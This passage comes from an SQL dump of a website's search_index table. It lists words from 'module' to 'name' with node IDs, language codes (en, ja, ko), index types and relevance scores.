('module', 69, 'en', 'help_search', 5),
('module', 69, 'ja', 'help_search', 5),
('module', 69, 'ko', 'help_search', 5),
('module', 74, 'en', 'help_search', 38),
('module', 74, 'ja', 'help_search', 38),
('module', 74, 'ko', 'help_search', 38),
('module', 75, 'en', 'help_search', 38),
('module', 75, 'ja', 'help_search', 38),
('module', 75, 'ko', 'help_search', 38),
('module', 76, 'en', 'help_search', 2),
('module', 76, 'ja', 'help_search', 2),
('module', 76, 'ko', 'help_search', 2),
('module', 79, 'en', 'help_search', 2),
('module', 79, 'ja', 'help_search', 2),
('module', 79, 'ko', 'help_search', 2),
('module', 80, 'en', 'help_search', 1.8843),
('module', 80, 'ja', 'help_search', 1.8843),
('module', 80, 'ko', 'help_search', 1.8843),
('module', 81, 'en', 'help_search', 6),
('module', 81, 'ja', 'help_search', 6),
('module', 81, 'ko', 'help_search', 6),
('module', 84, 'en', 'help_search', 3),
('module', 84, 'ja', 'help_search', 3),
('module', 84, 'ko', 'help_search', 3),
('module', 89, 'en', 'help_search', 2),
('module', 89, 'ja', 'help_search', 2),
('module', 89, 'ko', 'help_search', 2),
('module', 93, 'en', 'help_search', 3.19292),
('module', 93, 'ja', 'help_search', 3.19292),
('module', 93, 'ko', 'help_search', 3.19292),
('modules', 2, 'en', 'help_search', 1),
('modules', 2, 'ja', 'help_search', 1),
('modules', 2, 'ko', 'help_search', 1),
('modules', 6, 'en', 'help_search', 2.96109),
('modules', 6, 'ja', 'help_search', 2.96109),
('modules', 6, 'ko', 'help_search', 2.96109),
('modules', 11, 'en', 'help_search', 0.976851),
('modules', 11, 'ja', 'help_search', 0.976851),
('modules', 11, 'ko', 'help_search', 0.976851),
('modules', 23, 'en', 'help_search', 1),
('modules', 23, 'ja', 'help_search', 1),
('modules', 23, 'ko', 'help_search', 1),
('modules', 28, 'en', 'help_search', 1),
('modules', 28, 'ja', 'help_search', 1),
('modules', 28, 'ko', 'help_search', 1),
('modules', 29, 'en', 'help_search', 2.98087),
('modules', 29, 'ja', 'help_search', 2.98087),
('modules', 29, 'ko', 'help_search', 2.98087),
('modules', 30, 'en', 'help_search', 0.7017),
('modules', 30, 'ja', 'help_search', 0.7017),
('modules', 30, 'ko', 'help_search', 0.7017),
('modules', 31, 'ja', 'help_search', 4.85309),
('modules', 32, 'en', 'help_search', 1),
('modules', 32, 'ja', 'help_search', 1),
('modules', 32, 'ko', 'help_search', 1),
('modules', 33, 'en', 'help_search', 21),
('modules', 33, 'ja', 'help_search', 21),
('modules', 33, 'ko', 'help_search', 21),
('modules', 34, 'en', 'help_search', 1),
('modules', 34, 'ja', 'help_search', 1),
('modules', 34, 'ko', 'help_search', 1),
('modules', 35, 'en', 'help_search', 3),
('modules', 35, 'ja', 'help_search', 3),
('modules', 35, 'ko', 'help_search', 3),
('modules', 36, 'en', 'help_search', 2),
('modules', 36, 'ja', 'help_search', 2),
('modules', 36, 'ko', 'help_search', 2),
('modules', 37, 'en', 'help_search', 1),
('modules', 37, 'ja', 'help_search', 1),
('modules', 37, 'ko', 'help_search', 1),
('modules', 38, 'en', 'help_search', 2),
('modules', 38, 'ja', 'help_search', 2),
('modules', 38, 'ko', 'help_search', 2),
('modules', 40, 'en', 'help_search', 1),
('modules', 40, 'ja', 'help_search', 1),
('modules', 40, 'ko', 'help_search', 1),
('modules', 41, 'en', 'help_search', 2),
('modules', 41, 'ja', 'help_search', 2),
('modules', 41, 'ko', 'help_search', 2),
('modules', 43, 'en', 'help_search', 6.68775),
('modules', 43, 'ja', 'help_search', 6.68775),
('modules', 43, 'ko', 'help_search', 6.68775),
('modules', 44, 'en', 'help_search', 33),
('modules', 44, 'ja', 'help_search', 33),
('modules', 44, 'ko', 'help_search', 33),
('modules', 45, 'en', 'help_search', 1),
('modules', 45, 'ja', 'help_search', 1),
('modules', 45, 'ko', 'help_search', 1),
('modules', 46, 'en', 'help_search', 9),
('modules', 46, 'ja', 'help_search', 9),
('modules', 46, 'ko', 'help_search', 9),
('modules', 50, 'en', 'help_search', 1),
('modules', 50, 'ja', 'help_search', 1),
('modules', 50, 'ko', 'help_search', 1),
('modules', 59, 'en', 'help_search', 1),
('modules', 59, 'ja', 'help_search', 1),
('modules', 59, 'ko', 'help_search', 1),
('modules', 61, 'en', 'help_search', 1),
('modules', 61, 'ja', 'help_search', 1),
('modules', 61, 'ko', 'help_search', 1),
('modules', 62, 'en', 'help_search', 1),
('modules', 62, 'ja', 'help_search', 1),
('modules', 62, 'ko', 'help_search', 1),
('modules', 68, 'en', 'help_search', 23),
('modules', 68, 'ja', 'help_search', 23),
('modules', 68, 'ko', 'help_search', 23),
('modules', 74, 'en', 'help_search', 4),
('modules', 74, 'ja', 'help_search', 4),
('modules', 74, 'ko', 'help_search', 4),
('modules', 75, 'en', 'help_search', 3),
('modules', 75, 'ja', 'help_search', 3),
('modules', 75, 'ko', 'help_search', 3),
('modules', 76, 'en', 'help_search', 2),
('modules', 76, 'ja', 'help_search', 2),
('modules', 76, 'ko', 'help_search', 2),
('modules', 84, 'en', 'help_search', 1),
('modules', 84, 'ja', 'help_search', 1),
('modules', 84, 'ko', 'help_search', 1),
('modules', 93, 'en', 'help_search', 1),
('modules', 93, 'ja', 'help_search', 1),
('modules', 93, 'ko', 'help_search', 1),
('moe', 89, 'en', 'node_search', 2),
('moe', 89, 'ja', 'node_search', 2),
('moe', 115, 'en', 'node_search', 28),
('moe', 115, 'ja', 'node_search', 28),
('moe', 130, 'en', 'node_search', 1),
('moe', 130, 'ja', 'node_search', 1),
('moe', 153, 'en', 'node_search', 1),
('moe', 153, 'ja', 'node_search', 1),
('moe', 154, 'en', 'node_search', 1),
('moe', 154, 'ja', 'node_search', 1),
('moe', 169, 'en', 'node_search', 1),
('moe', 169, 'ja', 'node_search', 1),
('moe', 177, 'en', 'node_search', 2),
('moe', 177, 'ja', 'node_search', 1.71423),
('moe', 184, 'en', 'node_search', 4),
('moe', 184, 'ja', 'node_search', 3.52376),
('moe', 194, 'en', 'node_search', 12),
('moe', 194, 'ja', 'node_search', 8.01849),
('moe', 197, 'en', 'node_search', 6),
('moe', 197, 'ja', 'node_search', 4.07688),
('mon', 1, 'ja', 'node_search', 1),
('mon', 1, 'ko', 'node_search', 1),
('mon', 3, 'ja', 'node_search', 1),
('mon', 3, 'ko', 'node_search', 1),
('mon', 4, 'ja', 'node_search', 1),
('mon', 4, 'ko', 'node_search', 1),
('mon', 5, 'ko', 'node_search', 1),
('mon', 6, 'ja', 'node_search', 1),
('mon', 6, 'ko', 'node_search', 1),
('mon', 7, 'ja', 'node_search', 1),
('mon', 7, 'ko', 'node_search', 1),
('mon', 8, 'ja', 'node_search', 1),
('mon', 8, 'ko', 'node_search', 1),
('mon', 9, 'ja', 'node_search', 1),
('mon', 9, 'ko', 'node_search', 1),
('mon', 10, 'ja', 'node_search', 1),
('mon', 10, 'ko', 'node_search', 1),
('mon', 11, 'ja', 'node_search', 1),
('mon', 11, 'ko', 'node_search', 1),
('mon', 17, 'ja', 'node_search', 1),
('mon', 17, 'ko', 'node_search', 1),
('mon', 18, 'ja', 'node_search', 1),
('mon', 18, 'ko', 'node_search', 1),
('mon', 19, 'ja', 'node_search', 1),
('mon', 19, 'ko', 'node_search', 1),
('mon', 20, 'en', 'node_search', 1),
('mon', 20, 'ja', 'node_search', 2),
('mon', 20, 'ko', 'node_search', 2),
('mon', 21, 'en', 'node_search', 1),
('mon', 22, 'en', 'node_search', 1),
('mon', 23, 'en', 'node_search', 1),
('mon', 23, 'ja', 'node_search', 1),
('mon', 23, 'ko', 'node_search', 1),
('mon', 24, 'en', 'node_search', 1),
('mon', 24, 'ja', 'node_search', 1),
('mon', 25, 'en', 'node_search', 1),
('mon', 25, 'ja', 'node_search', 1),
('mon', 25, 'ko', 'node_search', 1),
('mon', 26, 'en', 'node_search', 1),
('mon', 26, 'ja', 'node_search', 1),
('mon', 26, 'ko', 'node_search', 1),
('mon', 27, 'en', 'node_search', 1),
('mon', 27, 'ja', 'node_search', 1),
('mon', 27, 'ko', 'node_search', 1),
('mon', 68, 'en', 'node_search', 1),
('mon', 68, 'ja', 'node_search', 1),
('mon', 71, 'en', 'node_search', 1),
('mon', 71, 'ja', 'node_search', 1),
('mon', 72, 'en', 'node_search', 1),
('mon', 72, 'ja', 'node_search', 1),
('mon', 74, 'en', 'node_search', 1),
('mon', 74, 'ja', 'node_search', 1),
('mon', 75, 'en', 'node_search', 1),
('mon', 75, 'ja', 'node_search', 1),
('mon', 78, 'en', 'node_search', 2),
('mon', 78, 'ja', 'node_search', 2),
('mon', 82, 'en', 'node_search', 1),
('mon', 82, 'ja', 'node_search', 1),
('mon', 90, 'en', 'node_search', 1),
('mon', 90, 'ja', 'node_search', 1),
('mon', 92, 'en', 'node_search', 1),
('mon', 92, 'ja', 'node_search', 1),
('mon', 94, 'en', 'node_search', 2),
('mon', 95, 'en', 'node_search', 1),
('mon', 95, 'ja', 'node_search', 1),
('mon', 96, 'en', 'node_search', 2),
('mon', 96, 'ja', 'node_search', 2),
('mon', 100, 'en', 'node_search', 1),
('mon', 100, 'ja', 'node_search', 1),
('mon', 108, 'en', 'node_search', 1),
('mon', 108, 'ja', 'node_search', 1),
('mon', 109, 'en', 'node_search', 1),
('mon', 109, 'ja', 'node_search', 1),
('mon', 110, 'en', 'node_search', 1),
('mon', 110, 'ja', 'node_search', 1),
('mon', 112, 'en', 'node_search', 1),
('mon', 112, 'ja', 'node_search', 1),
('mon', 114, 'en', 'node_search', 28),
('mon', 114, 'ja', 'node_search', 31),
('mon', 123, 'en', 'node_search', 28),
('mon', 123, 'ja', 'node_search', 31),
('mon', 134, 'en', 'node_search', 1),
('mon', 134, 'ja', 'node_search', 1),
('mon', 140, 'en', 'node_search', 1),
('mon', 140, 'ja', 'node_search', 1),
('mon', 142, 'en', 'node_search', 1),
('mon', 142, 'ja', 'node_search', 1),
('mon', 153, 'en', 'node_search', 2),
('mon', 153, 'ja', 'node_search', 2),
('mon', 157, 'en', 'node_search', 2),
('mon', 157, 'ja', 'node_search', 2),
('mon', 160, 'en', 'node_search', 1),
('mon', 160, 'ja', 'node_search', 1),
('mon', 165, 'en', 'node_search', 1),
('mon', 165, 'ja', 'node_search', 1),
('mon', 169, 'en', 'node_search', 1),
('mon', 169, 'ja', 'node_search', 1),
('mon', 184, 'en', 'node_search', 1),
('mon', 184, 'ja', 'node_search', 1),
('mon', 189, 'en', 'node_search', 6),
('mon', 189, 'ja', 'node_search', 3.99983),
('mon', 190, 'en', 'node_search', 6),
('mon', 190, 'ja', 'node_search', 4.07688),
('mon', 197, 'en', 'node_search', 1),
('mon', 197, 'ja', 'node_search', 1),
('mon', 198, 'en', 'node_search', 1),
('mon', 198, 'ja', 'node_search', 1),
('mon', 199, 'en', 'node_search', 1),
('mon', 199, 'ja', 'node_search', 1),
('mon', 200, 'ja', 'node_search', 1),
('monday', 31, 'en', 'node_search', 1),
('monday', 62, 'en', 'node_search', 1.85896),
('monday', 142, 'en', 'node_search', 1),
('monday', 155, 'en', 'node_search', 1),
('money', 8, 'en', 'node_search', 2),
('money', 31, 'en', 'node_search', 1.98087),
('mong', 84, 'en', 'node_search', 28),
('mong', 84, 'ja', 'node_search', 28),
('monotony', 142, 'en', 'node_search', 1),
('month', 3, 'en', 'node_search', 1),
('month', 3, 'ko', 'node_search', 1),
('month', 47, 'en', 'help_search', 2),
('month', 47, 'ja', 'help_search', 2),
('month', 47, 'ko', 'help_search', 2),
('month', 162, 'en', 'node_search', 1.95723),
('monthly', 162, 'en', 'node_search', 1),
('months', 3, 'en', 'node_search', 1),
('months', 3, 'ko', 'node_search', 1),
('months', 31, 'en', 'node_search', 1),
('months', 62, 'en', 'node_search', 1.84332),
('months', 66, 'en', 'node_search', 2),
('months', 155, 'en', 'node_search', 1),
('months', 165, 'en', 'node_search', 1),
('months', 184, 'en', 'node_search', 27),
('morals', 87, 'en', 'node_search', 1),
('more', 1, 'en', 'node_search', 1),
('more', 2, 'en', 'help_search', 1),
('more', 2, 'ja', 'help_search', 1),
('more', 2, 'ko', 'help_search', 1),
('more', 4, 'en', 'help_search', 1),
('more', 4, 'ja', 'help_search', 1),
('more', 4, 'ko', 'help_search', 1),
('more', 4, 'ko', 'node_search', 27),
('more', 7, 'en', 'help_search', 1),
('more', 7, 'en', 'node_search', 2),
('more', 7, 'ja', 'help_search', 1),
('more', 7, 'ko', 'help_search', 1),
('more', 7, 'ko', 'node_search', 2),
('more', 8, 'en', 'help_search', 1),
('more', 8, 'en', 'node_search', 2),
('more', 8, 'ja', 'help_search', 1),
('more', 8, 'ko', 'help_search', 1),
('more', 9, 'en', 'help_search', 2),
('more', 9, 'ja', 'help_search', 2),
('more', 9, 'ko', 'help_search', 2),
('more', 10, 'en', 'help_search', 2),
('more', 10, 'ja', 'help_search', 2),
('more', 10, 'ko', 'help_search', 2),
('more', 11, 'en', 'help_search', 1.90974),
('more', 11, 'ja', 'help_search', 1.90974),
('more', 11, 'ko', 'help_search', 1.90974),
('more', 12, 'en', 'help_search', 1),
('more', 12, 'ja', 'help_search', 1),
('more', 12, 'ko', 'help_search', 1),
('more', 13, 'en', 'help_search', 1),
('more', 13, 'ja', 'help_search', 1),
('more', 13, 'ko', 'help_search', 1),
('more', 14, 'en', 'help_search', 1),
('more', 14, 'ja', 'help_search', 1),
('more', 14, 'ko', 'help_search', 1),
('more', 15, 'en', 'help_search', 1),
('more', 15, 'ja', 'help_search', 1),
('more', 15, 'ko', 'help_search', 1),
('more', 16, 'en', 'help_search', 1),
('more', 16, 'ja', 'help_search', 1),
('more', 16, 'ko', 'help_search', 1),
('more', 17, 'en', 'help_search', 1),
('more', 17, 'ja', 'help_search', 1),
('more', 17, 'ko', 'help_search', 1),
('more', 18, 'en', 'help_search', 1),
('more', 18, 'ja', 'help_search', 1),
('more', 18, 'ko', 'help_search', 1),
('more', 19, 'en', 'help_search', 1),
('more', 19, 'ja', 'help_search', 1),
('more', 19, 'ko', 'help_search', 1),
('more', 20, 'en', 'help_search', 1),
('more', 20, 'ja', 'help_search', 1),
('more', 20, 'ko', 'help_search', 1),
('more', 23, 'en', 'help_search', 1),
('more', 23, 'en', 'node_search', 2),
('more', 23, 'ja', 'help_search', 1),
('more', 23, 'ko', 'help_search', 1),
('more', 27, 'en', 'help_search', 1),
('more', 27, 'ja', 'help_search', 1),
('more', 27, 'ko', 'help_search', 1),
('more', 28, 'en', 'help_search', 1),
('more', 28, 'ja', 'help_search', 1),
('more', 28, 'ko', 'help_search', 1),
('more', 29, 'en', 'help_search', 1),
('more', 29, 'ja', 'help_search', 1),
('more', 29, 'ko', 'help_search', 1),
('more', 30, 'en', 'node_search', 1),
('more', 31, 'ja', 'help_search', 6.6464),
('more', 34, 'en', 'help_search', 1),
('more', 34, 'ja', 'help_search', 1),
('more', 34, 'ko', 'help_search', 1),
('more', 35, 'en', 'help_search', 2),
('more', 35, 'ja', 'help_search', 2),
('more', 35, 'ko', 'help_search', 2),
('more', 40, 'en', 'help_search', 1),
('more', 40, 'ja', 'help_search', 1),
('more', 40, 'ko', 'help_search', 1),
('more', 41, 'en', 'help_search', 2),
('more', 41, 'ja', 'help_search', 2),
('more', 41, 'ko', 'help_search', 2),
('more', 42, 'en', 'help_search', 1),
('more', 42, 'ja', 'help_search', 1),
('more', 42, 'ko', 'help_search', 1),
('more', 43, 'en', 'help_search', 2.86055),
('more', 43, 'ja', 'help_search', 2.86055),
('more', 43, 'ko', 'help_search', 2.86055),
('more', 44, 'en', 'help_search', 1),
('more', 44, 'ja', 'help_search', 1),
('more', 44, 'ko', 'help_search', 1),
('more', 46, 'en', 'help_search', 1),
('more', 46, 'ja', 'help_search', 1),
('more', 46, 'ko', 'help_search', 1),
('more', 48, 'en', 'help_search', 1),
('more', 48, 'ja', 'help_search', 1),
('more', 48, 'ko', 'help_search', 1),
('more', 50, 'en', 'help_search', 1),
('more', 50, 'ja', 'help_search', 1),
('more', 50, 'ko', 'help_search', 1),
('more', 52, 'en', 'help_search', 1),
('more', 52, 'ja', 'help_search', 1),
('more', 52, 'ko', 'help_search', 1),
('more', 54, 'en', 'help_search', 1),
('more', 54, 'ja', 'help_search', 1),
('more', 54, 'ko', 'help_search', 1),
('more', 57, 'en', 'help_search', 1),
('more', 57, 'ja', 'help_search', 1),
('more', 57, 'ko', 'help_search', 1),
('more', 59, 'en', 'help_search', 2),
('more', 59, 'ja', 'help_search', 2),
('more', 59, 'ko', 'help_search', 2),
('more', 60, 'en', 'help_search', 1),
('more', 60, 'ja', 'help_search', 1),
('more', 60, 'ko', 'help_search', 1),
('more', 61, 'en', 'help_search', 1),
('more', 61, 'ja', 'help_search', 1),
('more', 61, 'ko', 'help_search', 1),
('more', 62, 'en', 'help_search', 1),
('more', 62, 'ja', 'help_search', 1),
('more', 62, 'ko', 'help_search', 1),
('more', 63, 'en', 'help_search', 1),
('more', 63, 'ja', 'help_search', 1),
('more', 63, 'ko', 'help_search', 1),
('more', 64, 'en', 'help_search', 1),
('more', 64, 'ja', 'help_search', 1),
('more', 64, 'ko', 'help_search', 1),
('more', 65, 'en', 'help_search', 1),
('more', 65, 'ja', 'help_search', 1),
('more', 65, 'ko', 'help_search', 1),
('more', 66, 'en', 'help_search', 1),
('more', 66, 'en', 'node_search', 1),
('more', 66, 'ja', 'help_search', 1),
('more', 67, 'en', 'help_search', 3),
('more', 67, 'ja', 'help_search', 3),
('more', 67, 'ko', 'help_search', 3),
('more', 68, 'en', 'help_search', 2.59912),
('more', 68, 'ja', 'help_search', 2.59912),
('more', 68, 'ko', 'help_search', 2.59912),
('more', 69, 'en', 'help_search', 2),
('more', 69, 'en', 'node_search', 1),
('more', 69, 'ja', 'help_search', 2),
('more', 69, 'ko', 'help_search', 2),
('more', 72, 'en', 'help_search', 0.909743),
('more', 72, 'ja', 'help_search', 0.909743),
('more', 72, 'ko', 'help_search', 0.909743),
('more', 74, 'en', 'help_search', 1),
('more', 74, 'ja', 'help_search', 1),
('more', 74, 'ko', 'help_search', 1),
('more', 79, 'en', 'help_search', 2),
('more', 79, 'ja', 'help_search', 2),
('more', 79, 'ko', 'help_search', 2),
('more', 80, 'en', 'help_search', 1),
('more', 80, 'ja', 'help_search', 1),
('more', 80, 'ko', 'help_search', 1),
('more', 81, 'en', 'help_search', 1),
('more', 81, 'ja', 'help_search', 1),
('more', 81, 'ko', 'help_search', 1),
('more', 82, 'en', 'help_search', 1),
('more', 82, 'ja', 'help_search', 1),
('more', 82, 'ko', 'help_search', 1),
('more', 84, 'en', 'help_search', 1),
('more', 84, 'ja', 'help_search', 1),
('more', 84, 'ko', 'help_search', 1),
('more', 89, 'en', 'help_search', 2),
('more', 89, 'ja', 'help_search', 2),
('more', 89, 'ko', 'help_search', 2),
('more', 91, 'en', 'help_search', 1),
('more', 91, 'ja', 'help_search', 1),
('more', 91, 'ko', 'help_search', 1),
('more', 92, 'en', 'help_search', 1),
('more', 92, 'ja', 'help_search', 1),
('more', 92, 'ko', 'help_search', 1),
('more', 93, 'en', 'help_search', 1.64807),
('more', 93, 'ja', 'help_search', 1.64807),
('more', 93, 'ko', 'help_search', 1.64807),
('more', 95, 'en', 'node_search', 1),
('more', 113, 'en', 'node_search', 1),
('more', 162, 'en', 'node_search', 0.98493),
('more', 197, 'en', 'node_search', 1),
('moreover', 23, 'en', 'node_search', 1),
('morning', 4, 'en', 'node_search', 1),
('morning', 4, 'ja', 'node_search', 1),
('morning', 87, 'en', 'node_search', 1),
('most', 22, 'en', 'help_search', 1),
('most', 22, 'ja', 'help_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('most', 22, 'ko', 'help_search', 1),
('most', 27, 'en', 'help_search', 1),
('most', 27, 'ja', 'help_search', 1),
('most', 27, 'ko', 'help_search', 1),
('most', 30, 'en', 'help_search', 0.703756),
('most', 30, 'ja', 'help_search', 0.703756),
('most', 30, 'ko', 'help_search', 0.703756),
('most', 31, 'ja', 'help_search', 2.33704),
('most', 39, 'en', 'help_search', 1),
('most', 39, 'ja', 'help_search', 1),
('most', 39, 'ko', 'help_search', 1),
('most', 42, 'en', 'help_search', 2),
('most', 42, 'ja', 'help_search', 2),
('most', 42, 'ko', 'help_search', 2),
('most', 47, 'en', 'help_search', 1),
('most', 47, 'ja', 'help_search', 1),
('most', 47, 'ko', 'help_search', 1),
('most', 48, 'en', 'help_search', 1),
('most', 48, 'ja', 'help_search', 1),
('most', 48, 'ko', 'help_search', 1),
('most', 50, 'en', 'help_search', 3),
('most', 50, 'ja', 'help_search', 3),
('most', 50, 'ko', 'help_search', 3),
('most', 54, 'en', 'help_search', 1),
('most', 54, 'ja', 'help_search', 1),
('most', 54, 'ko', 'help_search', 1),
('most', 68, 'en', 'help_search', 1),
('most', 68, 'ja', 'help_search', 1),
('most', 68, 'ko', 'help_search', 1),
('most', 73, 'en', 'help_search', 1),
('most', 73, 'ja', 'help_search', 1),
('most', 73, 'ko', 'help_search', 1),
('most', 76, 'en', 'help_search', 1),
('most', 76, 'ja', 'help_search', 1),
('most', 76, 'ko', 'help_search', 1),
('most', 88, 'en', 'help_search', 1),
('most', 88, 'ja', 'help_search', 1),
('most', 88, 'ko', 'help_search', 1),
('most', 93, 'en', 'help_search', 2),
('most', 93, 'ja', 'help_search', 2),
('most', 93, 'ko', 'help_search', 2),
('most', 116, 'en', 'node_search', 1),
('most', 155, 'en', 'node_search', 1),
('mostcommonlyused', 44, 'en', 'help_search', 1),
('mostcommonlyused', 44, 'ja', 'help_search', 1),
('mostcommonlyused', 44, 'ko', 'help_search', 1),
('motivated', 120, 'en', 'node_search', 1),
('motivated', 185, 'en', 'node_search', 1),
('motivated', 187, 'en', 'node_search', 1),
('mouse', 22, 'en', 'help_search', 1),
('mouse', 22, 'ja', 'help_search', 1),
('mouse', 22, 'ko', 'help_search', 1),
('move', 30, 'en', 'help_search', 1),
('move', 30, 'ja', 'help_search', 1),
('move', 30, 'ko', 'help_search', 1),
('move', 187, 'en', 'node_search', 1),
('move', 197, 'en', 'node_search', 1),
('moved', 194, 'en', 'node_search', 1),
('moved', 196, 'en', 'node_search', 1),
('moves', 178, 'en', 'node_search', 1),
('moves', 189, 'en', 'node_search', 1),
('moves', 195, 'en', 'node_search', 1),
('mrhong', 29, 'en', 'node_search', 28),
('mrhong', 29, 'ja', 'node_search', 28),
('much', 37, 'en', 'help_search', 1),
('much', 37, 'ja', 'help_search', 1),
('much', 37, 'ko', 'help_search', 1),
('multiple', 41, 'en', 'help_search', 1),
('multiple', 41, 'ja', 'help_search', 1),
('multiple', 41, 'ko', 'help_search', 1),
('multiple', 61, 'en', 'help_search', 1),
('multiple', 61, 'ja', 'help_search', 1),
('multiple', 61, 'ko', 'help_search', 1),
('multiple', 74, 'en', 'help_search', 1),
('multiple', 74, 'ja', 'help_search', 1),
('multiple', 74, 'ko', 'help_search', 1),
('multiple', 93, 'en', 'help_search', 1),
('multiple', 93, 'ja', 'help_search', 1),
('multiple', 93, 'ko', 'help_search', 1),
('multiplevalued', 31, 'ja', 'help_search', 0.961087),
('multiplier', 6, 'en', 'help_search', 1),
('multiplier', 6, 'ja', 'help_search', 1),
('multiplier', 6, 'ko', 'help_search', 1),
('multipliers', 6, 'en', 'help_search', 22.9496),
('multipliers', 6, 'ja', 'help_search', 22.9496),
('multipliers', 6, 'ko', 'help_search', 22.9496),
('must', 3, 'en', 'node_search', 2),
('must', 3, 'ko', 'node_search', 2),
('must', 4, 'en', 'node_search', 2),
('must', 4, 'ja', 'node_search', 2),
('must', 7, 'en', 'help_search', 1),
('must', 7, 'ja', 'help_search', 1),
('must', 7, 'ko', 'help_search', 1),
('must', 24, 'en', 'help_search', 1),
('must', 24, 'ja', 'help_search', 1),
('must', 24, 'ko', 'help_search', 1),
('must', 27, 'en', 'help_search', 1),
('must', 27, 'ja', 'help_search', 1),
('must', 27, 'ko', 'help_search', 1),
('must', 30, 'en', 'node_search', 6),
('must', 31, 'en', 'node_search', 3.86967),
('must', 39, 'en', 'help_search', 2),
('must', 39, 'ja', 'help_search', 2),
('must', 39, 'ko', 'help_search', 2),
('must', 79, 'en', 'help_search', 1),
('must', 79, 'ja', 'help_search', 1),
('must', 79, 'ko', 'help_search', 1),
('must', 81, 'en', 'help_search', 1),
('must', 81, 'ja', 'help_search', 1),
('must', 81, 'ko', 'help_search', 1),
('must', 92, 'en', 'help_search', 1),
('must', 92, 'ja', 'help_search', 1),
('must', 92, 'ko', 'help_search', 1),
('must', 93, 'en', 'help_search', 0.98493),
('must', 93, 'ja', 'help_search', 0.98493),
('must', 93, 'ko', 'help_search', 0.98493),
('mutual', 25, 'en', 'node_search', 1),
('mya', 154, 'en', 'node_search', 1),
('mya', 154, 'ja', 'node_search', 1),
('myae', 109, 'en', 'node_search', 28),
('myae', 109, 'ja', 'node_search', 31),
('myanmagonyi', 11, 'en', 'node_search', 1),
('myanmagonyi', 11, 'ja', 'node_search', 1),
('myanmagonyi', 11, 'ko', 'node_search', 1),
('myanmar', 3, 'en', 'node_search', 1),
('myanmar', 3, 'ko', 'node_search', 1),
('myanmar', 11, 'en', 'node_search', 1),
('myanmar', 11, 'ja', 'node_search', 1),
('myanmar', 23, 'en', 'node_search', 2.56763),
('myanmar', 24, 'en', 'node_search', 1),
('myanmar', 26, 'en', 'node_search', 1),
('myanmar', 87, 'en', 'node_search', 1),
('myanmar', 126, 'en', 'node_search', 1),
('myanmar', 154, 'en', 'node_search', 1),
('myanmar', 160, 'en', 'node_search', 1),
('myanmar', 164, 'en', 'node_search', 1),
('myanmar', 165, 'en', 'node_search', 1),
('myanmar', 167, 'en', 'node_search', 1),
('myanmar', 173, 'en', 'node_search', 1),
('myanmar', 174, 'en', 'node_search', 1),
('myanmar', 175, 'en', 'node_search', 1),
('myanmar', 179, 'en', 'node_search', 1),
('myar', 103, 'en', 'node_search', 6),
('myar', 103, 'ja', 'node_search', 6),
('myar', 137, 'en', 'node_search', 56),
('myar', 137, 'ja', 'node_search', 56),
('myar', 141, 'en', 'node_search', 28),
('myar', 141, 'ja', 'node_search', 28),
('myat', 73, 'en', 'node_search', 2),
('myat', 73, 'ja', 'node_search', 2),
('myat', 81, 'en', 'node_search', 31),
('myat', 81, 'ja', 'node_search', 31),
('myat', 97, 'en', 'node_search', 4),
('myat', 97, 'ja', 'node_search', 4),
('myat', 111, 'en', 'node_search', 4),
('myat', 111, 'ja', 'node_search', 4),
('myat', 130, 'en', 'node_search', 1),
('myat', 130, 'ja', 'node_search', 1),
('myat', 146, 'en', 'node_search', 29),
('myat', 146, 'ja', 'node_search', 1),
('myat', 153, 'en', 'node_search', 1),
('myat', 153, 'ja', 'node_search', 1),
('myat', 157, 'en', 'node_search', 1),
('myat', 157, 'ja', 'node_search', 1),
('myat', 161, 'en', 'node_search', 5),
('myat', 161, 'ja', 'node_search', 1.74996),
('myat', 164, 'en', 'node_search', 2),
('myat', 164, 'ja', 'node_search', 1.75231),
('myat', 173, 'en', 'node_search', 3),
('myat', 173, 'ja', 'node_search', 3),
('myat', 179, 'en', 'node_search', 3),
('myat', 179, 'ja', 'node_search', 1.73614),
('myawaddy', 27, 'en', 'node_search', 0.725015),
('myint', 27, 'en', 'node_search', 0.652202),
('myint', 70, 'en', 'node_search', 1),
('myint', 70, 'ja', 'node_search', 1),
('myint', 88, 'en', 'node_search', 2),
('myint', 88, 'ja', 'node_search', 1),
('myint', 146, 'en', 'node_search', 29),
('myint', 146, 'ja', 'node_search', 1),
('myint', 170, 'en', 'node_search', 5),
('myint', 170, 'ja', 'node_search', 3.98118),
('myo', 82, 'en', 'node_search', 28),
('myo', 82, 'ja', 'node_search', 28),
('myo', 85, 'en', 'node_search', 31),
('myo', 85, 'ja', 'node_search', 31),
('myo', 114, 'en', 'node_search', 28),
('myo', 114, 'ja', 'node_search', 31),
('myo', 129, 'en', 'node_search', 28),
('myo', 129, 'ja', 'node_search', 28),
('myo', 148, 'en', 'node_search', 1),
('myo', 148, 'ja', 'node_search', 1),
('nagasaki', 76, 'en', 'node_search', 4),
('nagoya', 162, 'en', 'node_search', 1),
('naing', 74, 'en', 'node_search', 1),
('naing', 74, 'ja', 'node_search', 1),
('naing', 103, 'en', 'node_search', 2),
('naing', 103, 'ja', 'node_search', 2),
('naing', 108, 'en', 'node_search', 2),
('naing', 108, 'ja', 'node_search', 2),
('naing', 113, 'en', 'node_search', 2),
('naing', 113, 'ja', 'node_search', 2),
('naing', 130, 'en', 'node_search', 2),
('naing', 130, 'ja', 'node_search', 2),
('naing', 139, 'en', 'node_search', 28),
('naing', 139, 'ja', 'node_search', 31),
('naing', 144, 'en', 'node_search', 31),
('naing', 144, 'ja', 'node_search', 31),
('naing', 153, 'en', 'node_search', 2),
('naing', 153, 'ja', 'node_search', 2),
('naing', 157, 'en', 'node_search', 1),
('naing', 157, 'ja', 'node_search', 1),
('naing', 167, 'en', 'node_search', 1),
('naing', 167, 'ja', 'node_search', 1),
('naing', 198, 'en', 'node_search', 2),
('naing', 198, 'ja', 'node_search', 1.78178),
('name', 1, 'en', 'help_search', 1),
('name', 1, 'ja', 'help_search', 1),
('name', 1, 'ko', 'help_search', 1),
('name', 2, 'en', 'help_search', 1),
('name', 2, 'ja', 'help_search', 1),
('name', 2, 'ko', 'help_search', 1),
('name', 3, 'en', 'help_search', 1),
('name', 3, 'ja', 'help_search', 1),
('name', 3, 'ko', 'help_search', 1),
('name', 4, 'en', 'help_search', 1),
('name', 4, 'ja', 'help_search', 1),
('name', 4, 'ko', 'help_search', 1),
('name', 5, 'en', 'help_search', 1),
('name', 5, 'ja', 'help_search', 1),
('name', 5, 'ko', 'help_search', 1),
('name', 6, 'en', 'help_search', 1),
('name', 6, 'ja', 'help_search', 1),
